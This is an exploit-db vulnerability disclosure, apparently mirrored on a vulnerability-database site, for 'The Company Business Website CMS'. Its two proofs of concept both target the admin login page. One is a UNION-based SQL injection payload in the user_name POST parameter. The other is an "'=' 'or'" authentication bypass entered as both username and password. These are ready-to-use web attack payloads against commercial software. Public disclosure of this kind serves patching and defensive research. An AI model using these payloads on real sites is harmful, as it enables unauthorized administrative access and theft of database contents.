Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAhmet Ümit BAYRAMEDB-ID:46586
HistoryMar 21, 2019 - 12:00 a.m.

The Company Business Website CMS - Multiple Vulnerabilities

2019-03-2100:00:00
Ahmet Ümit BAYRAM
www.exploit-db.com
44

7.4 High

AI Score

Confidence

Low

JSON
# Exploit Title: The Company Business Website CMS - 'user_name' SQL
Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/production/login.php
Vulnerable Parameter: user_name (POST)
Payload: user_name=VNfn' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
WMfV&user_password=&loggin=Psop


# Exploit Title: The Company Business Website CMS - Authentication Bypass
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/admin/production/login.php
Username: '=' 'or'
Password: '=' 'or'

7.4 High

AI Score

Confidence

Low

JSON